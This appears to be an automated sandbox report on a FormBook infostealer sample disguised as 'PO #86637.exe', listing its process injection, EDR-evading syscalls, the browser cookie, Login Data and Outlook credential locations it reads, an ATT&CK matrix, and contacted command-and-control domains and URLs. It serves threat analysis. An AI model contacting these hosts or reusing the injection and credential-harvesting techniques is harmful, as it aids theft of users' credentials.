            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\at.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\at.exeThread register set: target process: 7136Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\at.exeThread APC queued: target process: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PO #86637.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 834008Jump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\PO #86637.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #86637.exe"Jump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: PO #86637.exe, yRUFfzlnDkMN.exe, 00000002.00000000.1760073404.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547561937.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918724385.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: yRUFfzlnDkMN.exe, 00000002.00000000.1760073404.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547561937.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918724385.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: yRUFfzlnDkMN.exe, 00000002.00000000.1760073404.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547561937.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918724385.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: yRUFfzlnDkMN.exe, 00000002.00000000.1760073404.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547561937.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918724385.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: PO #86637.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\at.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PO #86637.exeBinary or memory string: WIN_XP
            Source: PO #86637.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: PO #86637.exeBinary or memory string: WIN_XPe
            Source: PO #86637.exeBinary or memory string: WIN_VISTA
            Source: PO #86637.exeBinary or memory string: WIN_7
            Source: PO #86637.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Scheduled Task/Job            		2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515412 Sample: PO #86637.exe Startdate: 22/09/2024 Architecture: WINDOWS Score: 100 28 www.syvra.xyz 2->28 30 www.zhuoyueapp.top 2->30 32 18 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 8 other signatures 2->50 10 PO #86637.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 yRUFfzlnDkMN.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 at.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 yRUFfzlnDkMN.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 easyanalytics.site 162.241.226.190, 49762, 49763, 49764 UNIFIEDLAYER-AS-1US United States 22->34 36 www.subitoadomicilio.shop 195.24.68.25, 49738, 49739, 49740 RU-CENTERRU Russian Federation 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO #86637.exe51%VirustotalBrowse
            PO #86637.exe74%ReversingLabsWin32.Trojan.AutoitInject
            PO #86637.exe100%AviraHEUR/AGEN.1321685
            PO #86637.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            easyanalytics.site1%VirustotalBrowse
            hm62t.top2%VirustotalBrowse
            kalomor.top5%VirustotalBrowse
            www.zhuoyueapp.top1%VirustotalBrowse
            www.subitoadomicilio.shop0%VirustotalBrowse
            www.syvra.xyz1%VirustotalBrowse
            loan-insurance.shop1%VirustotalBrowse
            www.dom-2.online0%VirustotalBrowse
            www.loan-insurance.shop1%VirustotalBrowse
            www.kalomor.top5%VirustotalBrowse
            www.teksales.space7%VirustotalBrowse
            www.hm62t.top2%VirustotalBrowse
            www.easyanalytics.site1%VirustotalBrowse
            www.route4.org0%VirustotalBrowse
            www.meery.store0%VirustotalBrowse
            www.linkbasic.net4%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.syvra.xyz/h2bb/0%Avira URL Cloudsafe
            https://kb.fastpanel.direct/troubleshoot/0%Avira URL Cloudsafe
            http://www.autonashville.com/7d10/?6X=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&_vft=vxWlbDi8ipa49jzp0%Avira URL Cloudsafe
            http://www.syvra.xyz/h2bb/?6X=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&_vft=vxWlbDi8ipa49jzp0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://kb.fastpanel.direct/troubleshoot/0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.syvra.xyz/h2bb/1%VirustotalBrowse
            http://www.subitoadomicilio.shop/x7sd/?6X=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI=&_vft=vxWlbDi8ipa49jzp0%Avira URL Cloudsafe
            http://www.hm62t.top/edpl/?6X=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&_vft=vxWlbDi8ipa49jzp0%Avira URL Cloudsafe
            http://www.hm62t.top/edpl/0%Avira URL Cloudsafe
            http://www.zhuoyueapp.top/6m23/0%Avira URL Cloudsafe
            http://www.kalomor.top/1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzp100%Avira URL Cloudmalware
            http://www.hm62t.top/edpl/2%VirustotalBrowse
            https://www.google.com0%Avira URL Cloudsafe
            http://www.route4.org/65ev/?_vft=vxWlbDi8ipa49jzp&6X=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk=0%Avira URL Cloudsafe
            http://www.dom-2.online/m409/0%Avira URL Cloudsafe
            http://www.kalomor.top/1i25/100%Avira URL Cloudmalware
            http://www.autonashville.com/7d10/0%Avira URL Cloudsafe
            http://www.zhuoyueapp.top/6m23/1%VirustotalBrowse
            https://www.google.com0%VirustotalBrowse
            https://www.aapanel.com/new/download.html?invite_code=aapanele0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.easyanalytics.site/21tc/0%Avira URL Cloudsafe
            http://www.subitoadomicilio.shop/x7sd/0%Avira URL Cloudsafe
            http://www.kalomor.top100%Avira URL Cloudmalware
            https://www.aapanel.com/new/download.html?invite_code=aapanele0%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%VirustotalBrowse
            http://www.easyanalytics.site/21tc/?6X=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&_vft=vxWlbDi8ipa49jzp0%Avira URL Cloudsafe
            http://www.dom-2.online/m409/?6X=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&_vft=vxWlbDi8ipa49jzp0%Avira URL Cloudsafe
            http://www.kalomor.top5%VirustotalBrowse
            http://www.subitoadomicilio.shop/x7sd/1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            easyanalytics.site
            		162.241.226.190
            		truetrueunknown
            hm62t.top
            		154.23.184.240
            		truetrueunknown
            kalomor.top
            		91.215.85.23
            		truetrueunknown
            www.zhuoyueapp.top
            		47.104.180.139
            		truetrueunknown
            autonashville.com
            		3.33.130.190
            		truetrue
              		unknown
              www.syvra.xyz
              		162.0.213.94
              		truetrueunknown
              loan-insurance.shop
              		84.32.84.32
              		truetrueunknown
              www.route4.org
              		34.150.58.73
              		truetrueunknown
              www.subitoadomicilio.shop
              		195.24.68.25
              		truetrueunknown
              www.dom-2.online
              		199.59.243.227
              		truetrueunknown
              www.kalomor.top
              		unknown
              		unknowntrueunknown
              www.hm62t.top
              		unknown
              		unknowntrueunknown
              www.teksales.space
              		unknown
              		unknowntrueunknown
              www.pelus-pijama-pro.shop
              		unknown
              		unknowntrue
                		unknown
                www.loan-insurance.shop
                		unknown
                		unknowntrueunknown
                www.linkbasic.net
                		unknown
                		unknowntrueunknown
                www.autonashville.com
                		unknown
                		unknowntrue
                  		unknown
                  www.easyanalytics.site
                  		unknown
                  		unknowntrueunknown
                  www.meery.store
                  		unknown
                  		unknowntrueunknown
                  www.torkstallningar.shop
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.syvra.xyz/h2bb/?6X=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&_vft=vxWlbDi8ipa49jzptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.autonashville.com/7d10/?6X=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&_vft=vxWlbDi8ipa49jzptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.syvra.xyz/h2bb/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.subitoadomicilio.shop/x7sd/?6X=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI=&_vft=vxWlbDi8ipa49jzptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hm62t.top/edpl/true
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hm62t.top/edpl/?6X=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&_vft=vxWlbDi8ipa49jzptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.zhuoyueapp.top/6m23/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
